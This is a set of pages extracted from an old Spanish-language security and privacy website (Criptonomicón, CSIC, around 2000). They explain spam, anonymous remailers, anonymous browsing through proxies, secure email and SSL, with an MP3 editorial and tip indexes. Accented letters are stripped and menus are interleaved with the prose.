Netscape a JavaScript para evitar el robo y posterior difusin de informacin.
Quieres ver cmo se puede colar uno a travs de agujeros en CGI? De la
forma ms tonta se podra producir un desastre, a veces simplemente leyendo
una base de datos.

Seguridad

Linux

Java

JavaScript

Cookies

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Crashes

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros.html (1 of 2) [25/10/2000 02:30:32 p.m.]

Agujeros de seguridad de los navegadores


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/agujeros.html (2 of 2) [25/10/2000 02:30:32 p.m.]

Correo basura (junk-mail o spam)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Se denomina correo basura (en ingls tambin conocido como


junk-mail o spam) a una cierta forma de inundar la Internet con
muchas copias (incluso millones) del mismo mensaje, en un
intento por alcanzar a gente que de otra forma nunca accedera a
recibirlo y menos a leerlo. La mayor parte del correo basura est
constituido por anuncios comerciales, normalmente de productos
dudosos, mtodos para hacerse rico o servicios en la frontera de la
legalidad. No deja de amargar la existencia a los usuarios de
Internet cuando encuentran sus buzones rebosando con correos del
estilo:

Introduccin

Por qu es malo

Cmo evitarlo

Truco casero

Recursos

CGI

Gane millones trabajando desde casa


Java

JavaScript

Cookies

Crashes

Agujeros

Dieta milagrosa pierda 10 kilos en una semana


Chicas XXX ardientes te estn esperando
Las listas de correo basura con las direcciones de correo electrnico de los clientes
potenciales (o vctimas seguras) se crean frecuentemente cribando los mensajes de
Usenet, robando direcciones en las listas de distribucin o comprndolas en las bases
de datos de los servicios en lnea de Internet (s, s, las venden a terceros) o bien
buscando direcciones por la red. Irnicamente, los propios spammers usan el spam
para anunciarse, como en este anuncio que recib recientemente.

Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/spam/index.htm (1 of 2) [25/10/2000 02:30:32 p.m.]

Correo basura (junk-mail o spam)


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/spam/index.htm (2 of 2) [25/10/2000 02:30:32 p.m.]

Repetidores de correo (remailers)

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Un repetidor de correo annimo (remailer) puede ser una compaa, organizacin o


entidad privada que posee cuentas de correo electrnico configuradas de forma tal
que reciben correos de terceros, les eliminan las cabeceras y nombres originales y los
reenvan al destinatario original del mensaje despus de un intervalo aleatorio de
tiempo y de mezclarlos con otros mensajes, de manera que se vuelva imposible
analizar el trfico. En definitiva, es equivalente a enviar correo postal sin escribir el
remite: el correo llega, pero nadie sabe quin lo envi ni pueden devolverlo.
Los repetidores de tipo 1 (llamados cypherpunk) reciben los
mensajes escritos con paquetes de software de correo electrnico
convencionales y los reexpiden. La siguiente generacin de
repetidores, los de tipo 2 (llamados mixmaster) usan un software
de cliente especial que anonimiza y cifra en el propio ordenador
del usuario y despus enva el correo directamente.
Java remailer

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

No obstante, hay que ser precavido, ya que existen dos tipos de


repetidores del tipo 1:
Telnet remailer
Los primeros, conocidos ms exactamente como
pseudorrepetidores annimos, te ofrecen una segunda direccin de correo
electrnico, desde la cual puedes enviar tus correos annimamente, y en la cual
recibirs correos de otra gente que te sern convenientemente reexpedidos, todo ello
conservando el anonimato. Sin embargo, en su base de datos debe aparecer tu
direccin real de correo para que te puedan reexpedir los correos. Es decir, tu
intimidad se mantiene inclume en la medida en que los operadores del repetidor de
correo no desvelen tu identidad (lo cual ya ha sucedido en Finlandia con una orden
judicial). Entre stos se cuentan Geocities, HotMail o NetAddress.

Los segundos son los genuinos repetidores de correo annimos y no conservan


ningn tipo de informacin sobre tu persona. Entre ellos estn los de tipo
Cypherpunk . Para aumentar la sensacin de seguridad, nada como encadenar varios
repetidores, de manera que se vuelva virtualmente imposible seguirnos la pista hasta
nuestra mquina.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Mixmaster representa la siguiente generacin de repetidores, el tipo II. Por medio de


potentes tcnicas burlan los mtodos de rastreo de mensajes reexpedidos (a las que
algunos repetidores cypherpunk sucumben). La contrapartida es que necesitan un
cliente especial para generar los mensajes.
Tambin los hay que funcionan va WWW, como Remailer, que permiten escribir en
la propia pgina del navegador la direccin del destinatario, el asunto y el cuerpo del
mensaje. En la misma lnea, ahora DejaNews ofrece un servicio gratis de correo

file:///C|/TEMP/criptonomicon/criptonomicon/remailers.html (1 of 3) [25/10/2000 02:30:33 p.m.]

Repetidores de correo (remailers)


Consejos prcticos

antispam para las news.

Referencias

Por qu conviene usarlos

Libro de Visitas

Siempre que enviamos correos, aunque cambiemos en el campo De: nuestra


direccin y nombre por otros, estamos revelando cierta informacin, como el nombre
de nuestra mquina y la hora en que se envi. En la vida cotidiana encontramos
numerosas situaciones en las cuales deseamos enviar nuestra opinin real sobre un
asunto, pero no nos conviene que se sepa quin lo hizo. Tal vez queremos expresar
libremente nuestras ideas polticas, religiosas o sexuales. Tal vez estemos buscando
trabajo y no queremos arriesgar el actual. Otras aplicaciones comunes en el mundo
de la Internet son el envo de noticias a grupos de Usenet, el envo de correos a listas
de distribucin, el envo de mensajes annimos con contenido crtico sobre ciertas
personas o productos, etc., y tambin la proteccin frente a futuros spammers.
Cuantas menos veces circule por la red nuestra direccin de correo electrnico, ms
difcil les ser obtenerla e inundarnos despus con su correo basura. En definitiva,
existen multitud de razones legtimas por las cuales usar repetidores.

Dnde encontrarlos
Existen gran cantidad de repetidores de correo annimo en la Red, algunos de los
cuales permiten especificar una direccin de remite falsa, si bien la mayora informan
simplemente de que el mensaje fue enviado desde una direccin annima.

Private Idaho
Private Idaho es uno de los programas ms conocidos, con el valor aadido de
permitir el cifrado con PGP, caracterstica que todo buen repetidor debera
incorporar. De esta forma, envindole al repetidor el mensaje cifrado, con la
direccin del destinatario final igualmente cifrada, ni siquiera leyendo nuestros
correos al salir de la mquina se sabr a quin iban dirigidos. El repetidor descifrar
el mensaje y lo reexpedir al destino correcto, ya sin cifrar. La seguridad todava se
puede incrementar encadenando varios repetidores annimos.

Recursos en la Red

Alakarga (en castellano)

Anonymous Remailer FAQ

Remailer

Anonimity and privacy on the Internet

Remailing 3 Servidores Annimos: Eugeni Web

Mails Annimos y Remailers: Eugeni Web

MailObscuro

file:///C|/TEMP/criptonomicon/criptonomicon/remailers.html (2 of 3) [25/10/2000 02:30:33 p.m.]

Repetidores de correo (remailers)

Annimos

Cmo detectar el origen de correos sospechosos y camuflar la identidad

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/remailers.html (3 of 3) [25/10/2000 02:30:33 p.m.]

Navegacin annima

Suscripcin gratis

Navegacin annima

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Cada vez que nos conectamos a un sitio Web, ste conoce automticamente nuestra
direccin IP, nombre de mquina, la pgina desde la que procedemos y a veces
incluso nuestra direccin de correo electrnico (quieres una demostracin?). De ah
en adelante, depender del servidor y de su poltica sobre intimidad lo que se har
con esa informacin. Con ayuda de las cookies se puede personalizar an ms la
informacin recabada acerca de los visitantes, registrando las pginas ms visitadas,
nuestras preferencias, dnde hemos estado, tiempo de la visita, etc. Con todos estos
elementos se pueden confeccionar perfiles de usuario cada vez ms exhaustivos y
detallados, con informacin muy personal que puede adquirir un valor considerable
en manos de casas publicitarias, y por la que se paga dinero.

Cookies

Por todo lo dicho, existen muchas situaciones en las que convendra navegar
annimamente sin dejar trazas de nuestra identidad, ya que con estos datos y
mediante programas de bsqueda de personas por su direccin de correo, se puede
obtener la identidad del cibernauta, incluyendo su nmero de telfono, direccin, y
ms. Por ejemplo, la red de DoubleClick fue capaz de identificar las preferencias
sobre vacaciones en cruceros de ms de 10 millones de personas en la Red. Gracias a
esa informacin, les enviaba anuncios a la medida de sus gustos (J. Voight, Beyond
the banner).

Crashes

Cmo se navega annimamente

CGI

Java

JavaScript

Agujeros

Existen dos mtodos:


Anonimizadores

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

El servicio de anonimato acta como un filtro de seguridad entre tu navegador y el


sitio Web que deseas visitar. Te conectas al anonimizador, introduces el URL al que
deseas ir, entonces ste se adentra en la Red en busca de la pgina que deseas ver y te
la muestra. Si posteriormente vas siguiendo enlaces de una pgina a otra, se
presentarn asimismo a travs del anonimizador.
Sus inconvenientes:
No funcionan con todos los sitios ni con los servidores seguros.
Tampoco se reciben cookies (lo cual para algunos representa ms bien un
alivio).
Desactivan todos los programas en Java, JavaScript, etc. (de nuevo, ventaja o
inconveniente segn para quin).

file:///C|/TEMP/criptonomicon/criptonomicon/anonimato.html (1 of 4) [25/10/2000 02:30:33 p.m.]

Navegacin annima
Consejos prcticos

Referencias

Libro de Visitas

Ralentizan la navegacin.
Para un servicio ptimo hay que pagar.
Aaden a las pginas que visitamos banners con publicidad de sus
patrocinadores.

El servicio de navegacin annima ms conocido es Anonymous Surfing.

Servidores Proxy
Tambin se puede navegar annimamente a travs de un servidor proxy. La idea
bsica de un servidor proxy es actuar de pasarela (gateway) entre tu mquina o tu red
y la Internet. Normalmente se usan para llevar las peticiones del cliente a travs de
un cortafuegos (firewall): el proxy espera a una peticin desde dentro del cortafuegos
y la expide al servidor remoto en el exterior del cortafuegos, lee la respuesta y la
enva de vuelta al cliente. Dado que en la prctica todos los clientes en una subred
salen a travs del mismo proxy, tambin sirven para prestar servicios como cach de
documentos que son pedidos por muchos clientes. De esta forma se reduce el coste
de trfico de red ya que a menudo gran cantidad de documentos son recuperados
desde el cach local una vez que la peticin inicial ha sido hecha.
As pues, el servidor proxy acta de manera semejante a un anonimizador, ya que es
l el que recupera las pginas Web, en lugar de la persona que est navegando. Sin
embargo, presentan una serie de limitaciones frente a los anonimizadores:
No impiden que las cookies se sigan almacenando en el disco duro del usuario.
Normalmente todas las visitas quedan registradas en el proxy.
La direccin IP del servidor proxy por defecto refleja tu nombre de dominio o
por lo menos se acerca mucho.
Se puede navegar annimamente a travs de proxies en:
proxy1.emirates.net.ae, HTTP port 8080

wwwcache.marques.co.za, HTTP port 3128

proxy.chs.edu.sg, HTTP port 3128

proxy.pty.com, HTTP port 8080

proxy.silcom.com, HTTP port 3128

proxy.tmc.edu.tw, HTTP port 3128

webcache.ms.mff.cuni.cz, HTTP port 8080

Algunos de los proxies presentan el inconveniente de restringir el acceso a ciertos


sitios Web segn sus polticas particulares. Adems es importante tener en cuenta
que no todos los proxies actan de forma verdaderamente annima, ya que algunos
revelan al sitio Web que visitas tu direccin IP. Ejemplos de proxy tales son:

file:///C|/TEMP/criptonomicon/criptonomicon/anonimato.html (2 of 4) [25/10/2000 02:30:33 p.m.]

Navegacin annima

littlehat.zetnet.co.uk, HTTP port 8080

proxy.networld.it, HTTP port 80

proxy.hro.nl, HTTP port 80

Digilab.tau.it, HTTP port 80

proxy.ecity.net, HTTP port 80

proxy.ipm.lviv.ua, HTTP port 80

Mi navegacin es annima?
Cmo puedo estar seguro de que cuando creo que navego annimamente, realmente
no estoy revelando mi direccin IP?
Ejecutando el siguiente programa CGI comprobars lo que se puede averiguar a
partir de tu direccin IP:
DNS

Si utilizas un proxy, se puede ejecutar el siguiente programa CGI:


Proxy

que te advertir de si detecta o no de dnde procedes. Recuerda que si este programa


lo hace, otros tambin pueden hacerlo.

Recursos en la Red

Alakarga (en castellano)

Anonymous Surfing

iproxy

CYBERPASS - Anonymous and personal account services

interMute Home Page

The Internet Junkbuster Home Page

Annimos

Anonymous WWW

The Lucent Personalized Web Assistant: Proxy Home Page

Cmo detectar el origen de correos sospechosos y camuflar la identidad

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre

file:///C|/TEMP/criptonomicon/criptonomicon/anonimato.html (3 of 4) [25/10/2000 02:30:33 p.m.]

Navegacin annima
privacidad, por favor consulte la declaracin de poltica sobre privacidad Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones. Infrmese sobre cmo recibir gratis el Boletn del
Criptonomicn en la pgina de suscripcin..

file:///C|/TEMP/criptonomicon/criptonomicon/anonimato.html (4 of 4) [25/10/2000 02:30:33 p.m.]

Correo Seguro

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

No hay nada ms fcil que leer los correos de otras personas, ya


Introduccin
que viajan desnudos por la Red. Valga la siguiente analoga. Un
correo electrnico normal es como una tarjeta postal sin sobre,
Cifrado
que puede leer todo el que tenga inters. Por consiguiente, la
mejor manera de preservar la intimidad en los mensajes de correo
Firma digital
electrnico es recurrir a la criptografa. Por medio de potentes
tcnicas criptogrficas, el contenido del mensaje pude ser enviado Proteger el correo
cifrado, permitiendo as que slo el destinatario legtimo del
correo sea capaz de leerlo. Con este mecanismo se garantiza la
Recursos
confidencialidad del correo. Sin embargo, los modernos sistemas
de seguridad del correo, como PGP y otros, no se limitan a cifrar
el contenido de los mensajes intercambiados, sino que tambin aaden otros
servicios, como la integridad, que garantiza que el contenido del mensaje no ha sido
alterado por el camino; la autenticacin, que asegura la identidad del remitente del
correo, de manera que podemos estar seguros de que fue escrito por quien lo envi y
no ha sido falsificado; y el no repudio, que nos protege frente a que posteriormente el
que envi el correo (o lo recibi de nosotros) alegue posteriormente no haberlo
enviado (o recibido si era el destinatario). Estos ltimos servicios se prestan mediante
las firmas digitales.
Veamos a continuacin muy brevemente cmo funcionan estas tcnicas.
Pgina siguiente: cifrado.

Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/correo/index.htm (1 of 2) [25/10/2000 02:30:34 p.m.]

Correo Seguro
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/correo/index.htm (2 of 2) [25/10/2000 02:30:34 p.m.]

Web Seguro

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Introduccin

Hay ocasiones en las que se hace necesario recibir/enviar


informacin sensible desde/a un servidor de Web. Veamos
algunos ejemplos.

SSL
S-HTTP
SSL vs S-HTTP

Certificados
Existen sitios Web de la Administracin con informacin
confidencial sobre becas, datos de personal, nminas, etc. Resulta Cmo obterner uno
evidente que no interesa que esa informacin sea accesible a toda la Red, sino slo a
un pequeo nmero autorizado de usuarios. Por lo tanto, no vale con restringir el
acceso mediante claves de acceso o procedimientos similares, adems la informacin
que viaja hacia esos usuarios debe ir cifrada, para evitar escuchas.

En el extremo opuesto, a menudo enviamos a un servidor informacin confidencial


sobre nuestra persona, por ejemplo en los formularios CGI. Nos interesa que el
servidor conozca los datos, pero no el resto de la Red, especialmente si estamos
realizando una transaccin comercial electrnica y revelamos nuestro nmero de
tarjeta de crdito, o simplemente nuestra direccin postal.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

En estos dos sencillos ejemplos se pone de manifiesto la necesidad de asegurar


mediante algn mecanismo la intimidad y la integridad en las sesiones con el
servidor Web. A decir verdad, resulta imposible garantizar al 100% la seguridad de
un sitio, pero cuanto ms seguros sean nuestra red y servidores, menos probable ser
que un pirata intente atacarlos, marchando a otros "bocados" ms apetecibles.

Recursos en la Red

Cmo realizar transacciones con garanta

Secure Sockets Layer

SSL 3.0 Specification

SSL Tunneling Description How to tunnel SSL through other


systems/protocols.
What is SSL encryption? SSL Encryption Information.

An Overview of SSL (version 2)

Archive ssl-users@mincom.oz.au

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/web.html (1 of 2) [25/10/2000 02:30:34 p.m.]

Web Seguro
Consejos prcticos

Referencias

Transport Layer Security (tls) Charter

SSLeay: SSLeay and SSLapps FAQ

S-HTTP

Inner Workings of S-HTTP

Comparing Designs of S-HTTP and SSL

Libro de Visitas

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/web.html (2 of 2) [25/10/2000 02:30:34 p.m.]

Susurros desde la Cripta

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Bienvenido a la Cripta
Estas pginas recogen una seleccin de mis editoriales publicados en el Boletn del
Criptonomicn, tratando la ms candente actualidad en materia de criptografa y
seguridad.
Podrs informarte y formar tu opinin acerca de los ltimos avances en comercio
electrnico, acerca de la evolucin de SSL y SET, los retos a los que se enfrentan las
Administraciones Pblicas, legislacin y regulaciones sobre criptografa, y mucho
ms.

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Bucea por estas pginas y emppate de los conceptos de seguridad que te permitirn
saber qu est pasando en el mundo de las tecnologas de la informacin en los
albores del tercer milenio.
Artculos publicados

Las guerras de los MP3

Sociedad de la Informacin o Sociedad de la Vigilancia?

Piratas de chaqueta y corbata

Proteccin de derechos de autor y retro-ingeniera

Las compras en el nuevo milenio

La seguridad de GSM se tambalea

Internet en la palma de su mano

La nueva banca digital del siglo que viene

Podemos hablar de criptologa espaola?

PKI o los cimientos de una criptografa de clave pblica

Espaa, a la vanguardia de las firmas electrnicas

Sobre puertas y ratoneras

Seguridad en el comercio electrnico: SSL o SET?

Privacidad y sociedad en Red

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/index.htm (1 of 2) [25/10/2000 02:30:35 p.m.]

Susurros desde la Cripta


Consejos prcticos

Referencias

Libro de Visitas

50 das de Declaracin de Renta por Internet

Barreras al comercio electrnico

La Declaracin de la Renta a travs de Internet

Tarjetas Monedero y Comercio Electrnico

Internet o no Internet?: Internet segura

El movimiento hacia el software abierto

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/index.htm (2 of 2) [25/10/2000 02:30:35 p.m.]

Las guerras de los MP3

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Las guerras de los MP3


Acabar el formato MP3 y la distribucin de msica a travs de Internet
con la industria discogrfica? Para muchos la respuesta es un contundente y
rotundo S. La nica duda resta en saber exactamente en cunto tiempo.

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Esta industria multimillonaria


se ha caracterizado por
aplastar todas las
tecnologas que
potencialmente podan
amenazar sus vastos
intereses econmicos.
Primero destruy el formato
DAT y cuando MP3 se
extenda peligrosamente, su
reaccin no se hizo esperar:
en cuanto Diamond lanz al
mercado su controvertido reproductor Rio, la RIAA (Asociacin Americana
de la Industria Discogrfica), que representa a los principales sellos
discogrficos del mundo, llev a la compaa a los tribunales alegando que
la venta de Rio alentara la piratera. El veredicto final, emitido en junio de
1999, declar que Rio no violaba ninguna ley ni la AHRA (Audio Home
Recording Act), en la medida en que el reproductor copia las canciones
directamente de un ordenador y no desde un CD original. Este veredicto se
consider una gran victoria de MP3 sobre la voraz industria discogrfica. A
continuacin, RIAA se volvi contra MP3.com, el mayor sitio web de
distribucin de msica comprimida. En enero de 2000, la asociacin de
discogrficas demand a MP3.com por supuesta infraccin de derechos de
autor de ms de 45.000 CD de msica, ofrecidos a travs de su servicio
My.MP3 en circunstancias que poco tenan que ver con las acusaciones. Por
su parte, MP3.com demand a RIAA un mes despus por prcticas
comerciales desleales, difamacin, libelo, e interferencias con posibles

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros20.html (1 of 3) [25/10/2000 02:30:36 p.m.]

Las guerras de los MP3


Consejos prcticos

Referencias

ganancias econmicas. Otros demandados por RIAA han sido Lycos (caso
perdido tambin) y Napster (probablemente, perdido tambin). Los
defensores de MP3 y la msica en Internet se preguntan, a cuntos ms
debe demandar la RIAA antes de darse cuenta de que su guerra est
perdida?

Libro de Visitas

Qu guerra? Cuando el canal de distribucin primario era el CD, las cosas


estaban atadas y bien atadas. Que alguien graba un CD a cinta? No
supone una amenaza, al fin y al cabo, la calidad es menor. Poco despus
hacen su aparicin los copiadores de CD-ROM. Que la industria
discogrfica afronta prdidas por piratera? Tampoco pasa nada, al fin y al
cabo, todos estn metidos en el mismo cotarro y son los que venden los
aparatos, los CD vrgenes y dems: se grava a los CD vrgenes con un
canon para afrontar las prdidas y los ingresos vuelven a su cauce. Que el
artista sale perdiendo? Qu se le va a hacer.
Sin embargo, la distribucin de msica a travs de Internet, que gracias al
formato de compresin de MP3 permite su rpida descarga y
almacenamiento en disco, hace tambalear los cimientos de este emporio. La
primera solucin buscada consisti en luchar contra MP3, pero no se puede
escupir a las cataratas del Nigara. Al fin y al cabo, a lo mejor hasta se
puede sacar tajada de Internet. Vivimos en plena fiebre de pelotazos, no?
"Si no puedes con ellos, nete a ellos", dice el refrn. La RIAA, con su
Iniciativa para la Msica Digital Segura (SDMI), est intentando poner freno
a la distribucin incontrolada del MP3, pero sin renunciar a sus nuevas
oportunidades de negocio a travs de Internet. La SDMI, lanzada por RIAA y
que rene a ms de 160 compaas y organizaciones, entre ellas sellos
discogrficos (como los gigantes EMI o Warner), compaas de electrnica y
de TI, proveedores de servicio de Internet y compaas de tecnologa de
seguridad, ha estado trabajando en la creacin de un estndar para la
proteccin de msica en MP3 y otros formatos. Hasta el momento, en su
Fase I, la SDMI ha acordado adoptar la tecnologa de Verance Corporation,
llamada Musicode, para la insercin de marcas de agua robustas en las
obras musicales. La Sociedad General de Autores y Editores (SGAE) ha
firmado en diciembre del ao pasado un acuerdo con Verance, que licencia
a la SGAE para que utilice la tecnologa MusiCode de Verance para incluir
marcas de agua inaudibles en las obras musicales de sus miembros y
monitorizar automticamente sus difusiones pblicas por radio, TV e
Internet. De esta forma, la alianza entre SGAE y Verance supone un hito en
la historia de la moderna lucha contra la piratera digital.
En el futuro, los reproductores MP3, incluido Rio, que cumplan con las
especificaciones de la SDMI, slo sern capaces de reproducir la msica
grabada legalmente, dotando as a las compaas discogrficas de mayor
control sobre sus materiales protegidos. Con esta iniciativa, la RIAA
pretende adoptar un marco comn para que artistas y empresas de

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros20.html (2 of 3) [25/10/2000 02:30:36 p.m.]

Las guerras de los MP3

tecnologa y sellos discogrficos puedan utilizar Internet como nuevo canal


de distribucin, novedoso y potencialmente muy beneficioso. Eso s, velando
por la proteccin de los derechos de autor legtimos.
Queda por ver la aceptacin que tendrn estas nuevas medidas entre el
pblico y las pequeas casas y distribuidoras y tiendas de msica. Se
pretende salvaguardar las ventas de los grandes sellos, que ven amenazada
su posicin de abuso con la democratizacin de las tecnologas de copia y
reproduccin de msica, o proteger los derechos de autor de los artistas? La
criptografa no da respuestas a estas preguntas, ofrece herramientas para
proteger la propiedad intelectual, como las marcas de agua, pero nunca
infalibles. Y si no, que le pregunten a Stephen King.
Publicado en el Boletn del Criptonomicn #69.

Informacin adicional

Marcas de agua

SDMI

RIAA

SGAE

HispaMP3

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros20.html (3 of 3) [25/10/2000 02:30:36 p.m.]

Trucos y consejos prcticos para aumentar la seguridad

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Trucos y consejos prcticos para


aumentar la seguridad
A menudo me escribs con consultas variopintas o pidindome consejo sobre tal o
cual aspecto. Ha llegado un momento en que no puedo responder a todas vuestras
peticiones, aunque s que las leo todas, por lo que he decidido incluir en las ediciones
del boletn del Criptonomicn una seccin sobre consejos y trucos, donde cada
semana proporcionar alguna indicacin que resulte de utilidad prctica a la hora de
proteger nuestra intimidad o la seguridad de nuestros datos.
En esta seccin os ofrezco la recopilacin de esos trucos y consejos prcticos
clasificados por temas, para que tanto los usuarios de ordenadores conectados a
Internet, como los administradores de sistemas, puedan proteger su intimidad y
aumentar su seguridad.
Consejos para el administrador

Consejos para el usuario

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Agujeros

Spam

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/index.htm (1 of 2) [25/10/2000 02:30:36 p.m.]

Trucos y consejos prcticos para aumentar la seguridad


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/index.htm (2 of 2) [25/10/2000 02:30:36 p.m.]

Consejos y trucos para los administradores

Consejos para
administradores
Consejos para
usuarios

Consejos y trucos para los


administradores

Passwords

Actualizar y configurar

Escaneo de puertos

Conservar las huellas de los intrusos

Cmo controlar por dnde navegan los usuarios

Dedos acusadores

Cmo instalar SSL en un servidor

Cmo vender en Internet de forma inteligente

Cmo firmar applets de Java

LINUX como cortafuegos gratuito

Cmo evitar los volcados de memoria

Limpie su servidor web de ejemplos intiles

Cmo no recordar contraseas en Internet Explorer

Cmo activar SSL en tu servidor web

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/administradores.html [25/10/2000 02:30:37 p.m.]

Consejos y trucos para los usuarios

Consejos para
administradores
Consejos para
usuarios

Consejos y trucos para los usuarios

Cmo proteger la intimidad

Cmo protegerse frente a virus

Cmo proteger el correo en Windows

Cmo desactivar JavaScript en Internet Explorer

Cmo s si tengo Java activado?

Cuidado con los plug-ins

Consejos para navegar seguro en Internet

Cmo comprar de forma inteligente en Internet

La crisis de los escritorios seguros

Estamos seguros con SSL?

Configuracin segura del Registro en Windows NT

Configuracin segura del Registro en Windows NT (II)

Configuracin segura del Registro en Windows NT (III)

Publicar en las news sin dar tus verdaderos datos

Di NO al spam

Copia Carbn Oculta

Correo Web seguro

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/usuarios.html [25/10/2000 02:30:37 p.m.]

Cmo proteger la intimidad

Consejos para
administradores
Consejos para
usuarios

Cmo proteger la intimidad


Utiliza siempre la ltima versin del software
Continuamente aparecen nuevos agujeros en los navegadores, en Java, JavaScript,
